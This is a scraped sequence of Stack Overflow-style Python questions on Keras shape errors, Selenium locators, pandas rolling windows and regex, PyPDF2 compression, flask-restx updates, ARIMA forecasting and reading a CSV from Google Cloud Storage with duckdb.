lp.run_until_complete(grouprank(2315210162, "Recruit"))
</code></pre>
<p>The code above throws the following error:</p>
<pre><code>ssl.SSLError: Cannot create a client socket with a PROTOCOL_TLS_SERVER context (_ssl.c:795)
</code></pre>
<p>This code is meant to promote a player to another rank in a Roblox group using a bot.</p>
|
<python><python-3.x><roblox>
|
2023-05-21 02:52:20
| 2
| 1,196
|
openwld
|
76,298,066
| 11,885,185
|
How to solve broadcast issue in Deep Learning?
|
<p>I have a broadcasting issue in my code.</p>
<p>I got this error at Step 8:</p>
<pre><code>ValueError: non-broadcastable output operand with shape (1062433,1) doesn't match
the broadcast shape (1062433,2)
</code></pre>
<p>and I have this code:</p>
<p>Step 1: Read the data</p>
<pre><code>df = pd.read_csv('file1.csv')
</code></pre>
<p>Step 2: Split the data into training and testing sets</p>
<pre><code>train_end_date = df['Date'].max() - pd.DateOffset(years=5)
train_data = df[df['Date'] <= train_end_date]
test_data = df[df['Date'] > train_end_date]
</code></pre>
<p>Step 3: Normalize the data</p>
<pre><code>scaler = MinMaxScaler()
cols_to_scale = ['feature1', 'feature2']
train_data_scaled = scaler.fit_transform(train_data[cols_to_scale])
test_data_scaled = scaler.transform(test_data[cols_to_scale])
print("Step 3")
print("train_data_scaled", train_data_scaled.shape)
print("test_data_scaled", test_data_scaled.shape)
</code></pre>
<p>Step 4: Prepare the input sequences and labels</p>
<pre><code>def create_sequences(data, sequence_length):
X, y = [], []
for i in range(len(data) - sequence_length):
X.append(data[i:i+sequence_length, :])
y.append(data[i+sequence_length, 0])
return np.array(X), np.array(y)
sequence_length = 10
X_train, y_train = create_sequences(train_data_scaled, sequence_length)
X_test, y_test = create_sequences(test_data_scaled, sequence_length)
print("Step 4")
print("X_train", X_train.shape)
print("y_train", y_train.shape)
print("X_test", X_test.shape)
print("y_test", y_test.shape)
</code></pre>
<p>Step 5: Build the Transformer model</p>
<pre><code>input_shape = (sequence_length, X_train.shape[2])
inputs = Input(shape=input_shape)
x = inputs
num_layers = 2
d_model = 32
num_heads = 4
dff = 64
dropout_rate = 0.1
for _ in range(num_layers):
x = MultiHeadAttention(num_heads=num_heads, key_dim=d_model)(x, x)
x = Dropout(dropout_rate)(x)
x = LayerNormalization(epsilon=1e-6)(x)
x = tf.keras.layers.GlobalAveragePooling1D()(x)
x = Dense(units=1)(x)
model = Model(inputs=inputs, outputs=x)
</code></pre>
<p>Step 6: Compile and train the model</p>
<pre><code>model.compile(optimizer='adam', loss='mean_squared_error', metrics=['mae'])
model.fit(X_train, y_train, epochs=1, batch_size=32)
</code></pre>
<p>Step 7: Evaluate the model</p>
<pre><code>train_predictions = model.predict(X_train)
test_predictions = model.predict(X_test)
print("Step 7")
print("train_predictions at evaluation", train_predictions.shape)
print("test_predictions at evaluation", test_predictions.shape)
</code></pre>
<p>Step 8: Inverse transform the predictions to obtain the actual values - HERE IS THE ERROR</p>
<pre><code>train_predictions = scaler.inverse_transform(train_predictions.reshape(-1, 1)).flatten()
test_predictions = scaler.inverse_transform(test_predictions.reshape(-1, 1)).flatten()
print("Step 8")
print("train_predictions after inversion", train_predictions.shape)
print("test_predictions after inversion", test_predictions.shape)
</code></pre>
<p>As asked in the comments' section, I tried to print the most significant parts of the code in order to find out where it cracks. Therefore, these are the results:</p>
<pre><code>Step 3
train_data_scaled (1062443, 2)
test_data_scaled (308138, 2)
Step 4
X_train (1062433, 10, 2)
y_train (1062433,)
X_test (308128, 10, 2)
y_test (308128,)
33202/33202 [==============================] - 431s 13ms/step - loss: 2.1277e-05 - mae: 4.1088e-04
33202/33202 [==============================] - 203s 6ms/step
9629/9629 [==============================] - 55s 6ms/step
Step 7
train_predictions at evaluation (1062433, 1)
test_predictions at evaluation (308128, 1)
</code></pre>
<p>It definitely changed when training, but how could I solve this issue?</p>
<p>Thanks so much.
:D</p>
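<p>The shapes above point at the root cause: the scaler was fitted on two columns (<code>feature1</code>, <code>feature2</code>), so <code>inverse_transform</code> insists on input of shape (n, 2), while the model predicts only one column. One way around it (a numpy-only sketch, assuming MinMaxScaler's default <code>feature_range</code> of (0, 1)) is to invert just the first column manually with <code>x = x_scaled * (max - min) + min</code>, using <code>scaler.data_min_[0]</code> and <code>scaler.data_max_[0]</code> in the real code; the values below are stand-ins:</p>

```python
import numpy as np

# Stand-ins for scaler.data_min_[0] / scaler.data_max_[0] of 'feature1'
col_min, col_max = 10.0, 50.0

scaled_preds = np.array([[0.0], [0.5], [1.0]])  # model output, shape (n, 1)
preds = (scaled_preds * (col_max - col_min) + col_min).flatten()
# -> [10., 30., 50.]
```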
|
<python><tensorflow><scikit-learn><deep-learning>
|
2023-05-21 02:33:18
| 1
| 612
|
Oliver
|
76,297,961
| 6,056,160
|
Using Selenium to click a input type submit button
|
<p>Trying to click this</p>
<pre><code><input type="submit" value="Log In" class="btn btn-lg btn-primary btn-block">
</code></pre>
<p>I have tried</p>
<pre><code>driver.find_element("class", "btn").click()
driver.find_element("class", "btn btn-lg btn-primary btn-block").click()
driver.find_element("value", "Log In").click()
</code></pre>
<p>But all give error</p>
<pre><code>InvalidArgumentException: Message: invalid argument: invalid locator
</code></pre>
<p>How can I click on this?</p>
<p>EDIT:</p>
<p>Now I've tried</p>
<pre><code>driver.find_element(By.CLASS_NAME, "btn btn-lg btn-primary btn-block").click()
</code></pre>
<p>but get error</p>
<pre><code>NoSuchElementException: Message: no such element: Unable to locate element: {"method":"css selector","selector":".btn btn-lg btn-primary btn-block"}
</code></pre>
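<p><code>By.CLASS_NAME</code> accepts exactly one class name, which is why the space-separated attribute value never matches. A compound class needs a CSS selector in which each class is prefixed with a dot and the spaces removed, e.g. <code>driver.find_element(By.CSS_SELECTOR, ".btn.btn-lg.btn-primary.btn-block")</code>, or one matching on the value attribute, <code>driver.find_element(By.CSS_SELECTOR, "input[value='Log In']")</code>. A tiny stdlib helper that builds such a selector from the class attribute (a sketch — Selenium itself is not needed to build the string):</p>

```python
def classes_to_css(class_attr: str) -> str:
    """Turn a space-separated class attribute into a compound CSS selector."""
    return "." + ".".join(class_attr.split())

classes_to_css("btn btn-lg btn-primary btn-block")
# -> ".btn.btn-lg.btn-primary.btn-block"
```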
|
<python><selenium-webdriver><input><click><submit>
|
2023-05-21 01:39:04
| 1
| 5,241
|
Runner Bean
|
76,297,916
| 5,431,734
|
compare operation in a pandas rolling window
|
<p>I want to make a rolling window and compare the elements in this window with the most recent one. In fact I want to subtract the last value from all the others. For example, if we have the dataframe</p>
<pre><code>df = pd.DataFrame([
[2, 3, 5, 7,],
[8, 3, 6, 1],
[1, 5, 9, 13],
[7, 3, 2, 7],
[12, 4, 1, 0]
])
</code></pre>
<p>I would like to make a rolling window of length 4, so in this particular case the first window will be [2, 8, 1, 7]. Now the last element (which is 7) is greater than 2 and 1 but smaller than 8, hence the output of the operation will be -1+1-1 = -1 (-1 if greater, +1 if smaller; if equal, it doesn't really matter, but let's give a +1). Similarly for the next rolling window: 12 is greater than all the values in the window, therefore the operation will return -3.</p>
<p>The ideal output finally will be:</p>
<pre><code>[NaN, NaN, NaN, NaN]
[NaN, NaN, NaN, NaN]
[NaN, NaN, NaN, NaN]
[ -1,   3,   3,   1]
[ -3,  -1,   3,   3]
</code></pre>
<p>I tried with <code>pd.rolling().apply()</code> and also with <code>df.shift</code>, but couldn't get anywhere.</p>
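<p>One possible sketch of the operation described above, using <code>rolling().apply()</code> with a plain Python callback and the +1/-1 convention given in the question:</p>

```python
import numpy as np
import pandas as pd

df = pd.DataFrame([
    [2, 3, 5, 7],
    [8, 3, 6, 1],
    [1, 5, 9, 13],
    [7, 3, 2, 7],
    [12, 4, 1, 0],
])

def compare_last(window):
    # -1 for every earlier value that the last element exceeds,
    # +1 otherwise (smaller or equal), summed over the window
    last, earlier = window.iloc[-1], window.iloc[:-1]
    return np.where(last > earlier, -1, 1).sum()

# raw=False so the callback receives a Series (iloc works on it)
result = df.rolling(4).apply(compare_last, raw=False)
print(result)
```

On the sample data this reproduces the expected last two rows ([-1, 3, 3, 1] and [-3, -1, 3, 3]), with NaN in the first three rows where the window is incomplete.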
|
<python><pandas>
|
2023-05-21 01:11:35
| 2
| 3,725
|
Aenaon
|
76,297,879
| 4,115,031
|
Benchmarks of FastAPI vs async Flask?
|
<p>I'm a developer without an interest in benchmarking and I'm trying to decide whether I should use Flask or FastAPI to build some Python/Vue projects. I'm seeing stuff online about how FastAPI was faster than Flask because Flask was single-threaded or something like that, whereas FastAPI was async, but apparently more-recently Flask added async routes, and so now I'm wondering if FastAPI is still(?) faster than Flask.</p>
<p>Has anyone done benchmarking tests comparing FastAPI to Flask async routes? I can't find any when I search Google.</p>
|
<python><flask><fastapi>
|
2023-05-21 00:53:26
| 1
| 12,570
|
Nathan Wailes
|
76,297,824
| 2,769,240
|
PyPDF2 unable to compress pdf
|
<p>I want to show an embedded pdf on a streamlit app, which has a limitation of &lt;2MB on the pdf size to be displayed.</p>
<p>So I am trying to compress the pdf file which a user uploads via st.file_uploader on the streamlit app, using the PyPDF2 package. Here's the code I used:</p>
<pre><code>from PyPDF2 import PdfReader, PdfWriter
from io import BytesIO
def compress_pdf(pdf_file, target_size):
# Load PDF using PyPDF2
pdf_reader = PdfReader(pdf_file)
# Compress PDF using PyPDF2
output_pdf = BytesIO()
pdf_writer = PdfWriter()
for page in pdf_reader.pages:
page.compress_content_streams() # This is CPU intensive!
pdf_writer.add_page(page)
# Get the compressed PDF bytes
pdf_writer.write(output_pdf)
compressed_pdf_bytes = output_pdf.getvalue()
print(len(compressed_pdf_bytes)) # Check output of compressed pdf
return compressed_pdf_bytes
</code></pre>
<p>The above function takes in the file uploaded by the user on streamlit as below:</p>
<pre><code>uploaded_file = st.sidebar.file_uploader("Upload a file", key= "uploaded_file")
print(st.session_state.uploaded_file)
if uploaded_file is not None:
compressed_pdf_bytes= compress_pdf(uploaded_file, 2000000)
</code></pre>
<p>Even after doing all that, I see the file isn't compressed AT ALL.</p>
<p>This is the output in the terminal, as you can see. The size of the file uploaded and the length of compressed_pdf_bytes are almost the same.</p>
<pre><code>#Output of actual file uploaded.
UploadedFile(id=6, name='abc.pdf', type='application/pdf', size=4588407)
#output of compressed file in bytes
4472714
</code></pre>
|
<python><streamlit><pypdf>
|
2023-05-21 00:22:04
| 5
| 7,580
|
Baktaawar
|
76,297,696
| 3,034,686
|
Can't update a record using flask-restx sqlalchemy mariadb v10.5.20 "(mariadb.NotSupportedError) Data type 'tuple'"
|
<p><a href="https://github.com/christianbueno1/flask-api" rel="nofollow noreferrer">github repository</a></p>
<p>This is a simple REST API, have 2 classes Client, Product.</p>
<p><strong>Relationship:</strong> A client can have many products, Client 1---* Product.</p>
<p>I can list, create, and search by id with the 2 models, Client and Product. But now, working on the PUT (update) verb, the error below is shown.</p>
<p><strong>appi_model.py</strong></p>
<pre><code>product_model = api.model("ProductModel", {
"id": fields.Integer,
"sku": fields.String,
"description": fields.String,
"price": fields.Integer,
"quantity": fields.Integer,
"created_on": fields.DateTime,
"updated_on": fields.DateTime,
#relationship
"client": fields.Nested(client_model)
})
product_input_model = api.model("ProductInputModel", {
"sku": fields.String,
"description": fields.String,
"price": fields.Integer,
"quantity": fields.Integer,
#relationship
"client_id": fields.Integer,
})
</code></pre>
<p><strong>resource.py</strong></p>
<pre><code>@ns.route("/product")
class ProductList(Resource):
@ns.marshal_list_with(product_model)
def get(self):
return Product.query.all()
@ns.expect(product_input_model)
@ns.marshal_with(product_model)
def post(self):
product = Product(sku=ns.payload["sku"],
description=ns.payload["description"],
price=ns.payload["price"],
quantity= ns.payload["quantity"] or None,
client_id=ns.payload["client_id"])
db.session.add(product)
db.session.commit()
return product, 201
@ns.route("/product/<int:id>")
class ProductAPI(Resource):
@ns.marshal_with(product_model)
def get(self, id):
product = Product.query.get(id)
if product:
return product
else:
ns.abort(404, f"product with id {id} not found")
@ns.expect(product_input_model)
@ns.marshal_with(product_model)
def put(self, id):
product = Product.query.get(id)
if product:
product.sku = ns.payload["sku"],
product.description = ns.payload["description"],
product.price = ns.payload["price"],
product.quantity = ns.payload["quantity"],
product.client_id = ns.payload["client_id"]
db.session.commit()
return product
else:
ns.abort(404, f"product with id {id} not found")
</code></pre>
<p><strong>model.py</strong></p>
<pre><code>class Product(db.Model):
__tablename__= "product"
id = db.Column(db.Integer, primary_key=True)
sku = db.Column(db.String(25), index=True, nullable=False, unique=True)
description = db.Column(db.String(100), nullable=False)
price = db.Column(db.Numeric(12,4))
quantity = db.Column(db.Integer)
created_on = db.Column(db.DateTime, default=datetime.now)
updated_on = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
client_id = db.Column(db.ForeignKey("client.id"))
client = db.relationship("Client", back_populates="products")
def __repr__(self):
#literal string interpolation '''
return f'''<Product\n{self.id}\n{self.sku}\n{self.description}\n
{self.price}\n{self.quantity}\n{self.client_id}>'''
def __init__(self, sku, description, client_id, price=0, quantity=0):
self.sku = sku
self.description = description
self.client_id = client_id
self.price = price
self.quantity = quantity
</code></pre>
<p>Each time I try to update a record through the API, for example the product with id=4, with the new information below,</p>
<pre><code>{
"sku": "tech-gra-001",
"description": "Nvidia RTX 3080",
"price": 830,
"quantity": 5,
"client_id": 1
}
</code></pre>
<p>I am getting the following error:</p>
<p><a href="https://i.sstatic.net/Bw3by.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/Bw3by.png" alt="enter image description here" /></a></p>
<pre><code>sqlalchemy.exc.NotSupportedError: (mariadb.NotSupportedError) Data type 'tuple' in column 0 not supported in MariaDB
Connector/Python
[SQL: UPDATE product SET sku=?, description=?, price=?, quantity=?, updated_on=? WHERE product.id = ?]
[parameters: (('tech-gra-001',), ('Nvidia RTX 3080',), (830,), (5,), datetime.datetime(2023, 5, 20, 17, 52, 22, 7187
31), 4)]
</code></pre>
<p>The line where the error originates is:</p>
<pre><code>File "/home/chris/Documents/web-projects/crud-flask-product/blueprint/resource.py", line 79, in put
db.session.commit()
File "/home/chris/Documents/web-projects/crud-flask-product/env/lib64/python3.11/site-packages/sqlalchemy/orm/scop
ing.py", line 553, in commit
return self._proxied.commit()
</code></pre>
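<p>For context, the one-element tuples in the traceback's parameter list, e.g. <code>('tech-gra-001',)</code>, are what Python produces when an assignment ends with a trailing comma, which is the pattern in the <code>put</code> method's attribute assignments above. A minimal illustration:</p>

```python
# A trailing comma turns the right-hand side of an assignment into a
# one-element tuple -- the same ('tech-gra-001',) shape shown in the
# traceback's parameters.
sku = "tech-gra-001",          # trailing comma -> tuple
plain = "tech-gra-001"         # no trailing comma -> str

print(type(sku), type(plain))
```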
<p>Any advice is welcome.</p>
|
<python><flask><sqlalchemy><mariadb><flask-restx>
|
2023-05-20 23:17:37
| 1
| 592
|
christianbueno.1
|
76,297,649
| 2,781,105
|
Auto ARIMA in Python results in poor fitting prediction of trend
|
<p>I'm new to ARIMA and attempting to model a dataset in Python using auto ARIMA.
I'm using auto-ARIMA as I believe it will be better at defining the values of p, d and q; however, the results are poor and I need some guidance.
Please see my reproducible attempt below.</p>
<p>Attempt as follows:</p>
<pre><code> # DEPENDENCIES
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import pmdarima as pm
from pmdarima.model_selection import train_test_split
from statsmodels.tsa.stattools import adfuller
from pmdarima.arima import ADFTest
from pmdarima import auto_arima
from sklearn.metrics import r2_score
# CREATE DATA
data_plot = pd.DataFrame(data removed)
# SET INDEX
data_plot['date_index'] = pd.to_datetime(data_plot['date'])
data_plot.set_index('date_index', inplace=True)
# CREATE ARIMA DATASET
arima_data = data_plot[['value']]
arima_data
# PLOT DATA
arima_data['value'].plot(figsize=(7,4))
</code></pre>
<p>The above steps result in a dataset that should look like this.
<a href="https://i.sstatic.net/ku2YH.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/ku2YH.png" alt="enter image description here" /></a></p>
<pre><code># Dicky Fuller test for stationarity
adf_test = ADFTest(alpha = 0.05)
adf_test.should_diff(arima_data)
</code></pre>
<p>Result = 0.9867, indicating non-stationary data, which should be handled by an appropriate order of differencing later in the auto arima process.</p>
<pre><code># Assign training and test subsets - 80:20 split
print('Dataset dimensions;', arima_data.shape)
train_data = arima_data[:-24]
test_data = arima_data[-24:]
print('Training data dimension:', train_data.shape, round((len(train_data)/len(arima_data)*100),2),'% of dataset')
print('Test data dimension:', test_data.shape, round((len(train_data)/len(arima_data)*100),2),'% of dataset')
# Plot training & test data
plt.plot(train_data)
plt.plot(test_data)
</code></pre>
<p><a href="https://i.sstatic.net/0HvUn.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/0HvUn.png" alt="enter image description here" /></a></p>
<pre><code> # Run auto arima
arima_model = auto_arima(train_data, start_p=0, d=1, start_q=0,
max_p=5, max_d=5, max_q=5,
start_P=0, D=1, start_Q=0, max_P=5, max_D=5,
max_Q=5, m=12, seasonal=True,
stationary=False,
error_action='warn', trace=True,
suppress_warnings=True, stepwise=True,
random_state=20, n_fits=50)
print(arima_model.aic())
</code></pre>
<p>Output suggests best model is <code>'ARIMA(1,1,1)(0,1,0)[12]'</code> with AIC 1725.35484</p>
<pre><code>#Store predicted values and view resultant df
prediction = pd.DataFrame(arima_model.predict(n_periods=25), index=test_data.index)
prediction.columns = ['predicted_value']
prediction
# Plot prediction against test and training trends
plt.figure(figsize=(7,4))
plt.plot(train_data, label="Training")
plt.plot(test_data, label="Test")
plt.plot(prediction, label="Predicted")
plt.legend(loc='upper right')
plt.show()
</code></pre>
<p><a href="https://i.sstatic.net/RlyZz.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/RlyZz.png" alt="enter image description here" /></a></p>
<pre><code># Finding r2 model score
test_data['predicted_value'] = prediction
r2_score(test_data['value'], test_data['predicted_value'])
</code></pre>
<p>Result: -6.985</p>
|
<python><data-science><prediction><arima><pmdarima>
|
2023-05-20 23:02:23
| 2
| 889
|
jimiclapton
|
76,297,471
| 3,130,747
|
How to read a csv file from google storage using duckdb
|
<p>I'm using duckdb version <code>0.8.0</code></p>
<p>I have a CSV file located in google storage <code>gs://some_bucket/some_file.csv</code> and want to load this using duckdb.</p>
<p>In pandas I can do <code>pd.read_csv("gs://some_bucket/some_file.csv")</code>, but this doesn't seem to work in duckdb. I see that there's some documentation here: <a href="https://duckdb.org/docs/guides/import/s3_import.html" rel="nofollow noreferrer">https://duckdb.org/docs/guides/import/s3_import.html</a>, but I find that confusing as it's mainly aimed at <code>s3</code> usage.</p>
<p>I guess that I have to run:</p>
<pre class="lang-py prettyprint-override"><code>duckdb.sql("INSTALL httpfs;")
duckdb.sql("LOAD httpfs;")
</code></pre>
<p>From the documentation, I'm not sure what the parameters for:</p>
<pre><code>SET s3_access_key_id='key_id';
SET s3_secret_access_key='access_key';
</code></pre>
<p>would be.</p>
<p>How do I load a csv from google storage in duckdb?</p>
<h2>Edit - approaches which haven't worked</h2>
<p>I've added <code>hmac</code> keys and downloaded them following guide here: <a href="https://cloud.google.com/storage/docs/authentication/managing-hmackeys#gsutil_1" rel="nofollow noreferrer">https://cloud.google.com/storage/docs/authentication/managing-hmackeys#gsutil_1</a></p>
<pre class="lang-py prettyprint-override"><code>import duckdb
import os
duckdb.sql("LOAD httpfs;")
hmac_access = os.getenv('GOOGLE_HMAC_ACCESS_ID')
hmac_secret = os.getenv('GOOGLE_HMAC_SECRET')
duckdb.sql(f"SET s3_access_key_id='{hmac_access}';")
duckdb.sql(f"SET s3_secret_access_key='{hmac_secret}';")
################################################################################
# approach 1
# Doesn't work - fails with:
#
# Traceback (most recent call last):
# File "duck_test.py", line 18, in <module>
# duckdb.sql("SELECT * FROM '{gcp_path_1}'").show()
# duckdb.CatalogException: Catalog Error: Table with name {gcp_path_1} does not exist!
# Did you mean "pg_am"?
# duckdb.sql(f"SELECT * FROM '{gcp_path_1}'").show()
################################################################################
# approach 2
# Fails with:
# Traceback (most recent call last):
# File "duck_test.py", line 32, in <module>
# duckdb.sql(f"SELECT * from read_csv('{gcp_path_1}', AUTO_DETECT=TRUE);")
# duckdb.HTTPException: HTTP Error: HTTP GET error on 'https://some_bucket.s3.amazonaws.com/some_file.csv' (HTTP 400)
duckdb.sql(f"SELECT * from read_csv('{gcp_path_1}', AUTO_DETECT=TRUE);")
</code></pre>
<h2>Edit (working)</h2>
<p>In the code above I forgot to set</p>
<pre class="lang-py prettyprint-override"><code>duckdb.sql("SET s3_endpoint='storage.googleapis.com'")
</code></pre>
<p>After setting this both approaches read from storage.</p>
|
<python><csv><google-cloud-platform><duckdb>
|
2023-05-20 21:46:00
| 2
| 4,944
|
baxx
|
76,297,358
| 12,436,050
|
Replace characters and extract substrings from pandas dataframe
|
<p>I have the following pandas dataframe. I would like to replace some characters and extract substrings (there are more rows in the original dataframe).</p>
<p>I am using the following regex, but I am unable to remove the '?' from some rows, like rows 6, 7, and 8.</p>
<pre><code>df[['label', 'id']] = df['name'].str.extract(r'\{?\??\|?[[{]?(.*?)[]}]?(?:,\s+(\d{3,100}))?\s+\(\d+\)')
</code></pre>
<pre><code>You-Hoover-Fong syndrome, 616954 (3)
Yuan-Harel-Lupski syndrome (4)
Zaki syndrome, 619648 (3)
Zimmermann-Laband syndrome 2, 616455 (3)
Zimmermann-Laband syndrome 3, 618658 (3)
[?Birbeck granule deficiency], 613393 (3)
[?Homosexuality, male] (2)
[?Phosphohydroxylysinuria], 615011 (3)
[Acetylation, slow], 243400 (3)
</code></pre>
<p>The expected output is:</p>
<pre><code>You-Hoover-Fong syndrome 616954
Yuan-Harel-Lupski syndrome
Zaki syndrome 619648
Zimmermann-Laband syndrome 2 616455
Zimmermann-Laband syndrome 3 618658
Birbeck granule deficiency 613393
Homosexuality, male
Phosphohydroxylysinuria 615011
Acetylation, slow 243400
</code></pre>
<p>How can I modify the current regex so that the '?' is also removed from the mentioned rows?</p>
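<p>One possible sketch of a fix: in the data the bracket comes first (<code>[?</code>), so the optional <code>\??</code> has to be tried after the optional opening bracket, not before it. On the sample rows below this appears to produce the expected output:</p>

```python
import pandas as pd

df = pd.DataFrame({'name': [
    'You-Hoover-Fong syndrome, 616954 (3)',
    'Yuan-Harel-Lupski syndrome (4)',
    '[?Birbeck granule deficiency], 613393 (3)',
    '[?Homosexuality, male] (2)',
    '[Acetylation, slow], 243400 (3)',
]})

# Key change vs the original pattern: `\??` is placed AFTER `[\[{]?`,
# matching the '[?' order in the data.
pattern = r'[\[{]?\??(.*?)[\]}]?(?:,\s+(\d{3,100}))?\s+\(\d+\)'
df[['label', 'id']] = df['name'].str.extract(pattern)
print(df[['label', 'id']])
```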
|
<python><pandas><regex>
|
2023-05-20 21:09:43
| 2
| 1,495
|
rshar
|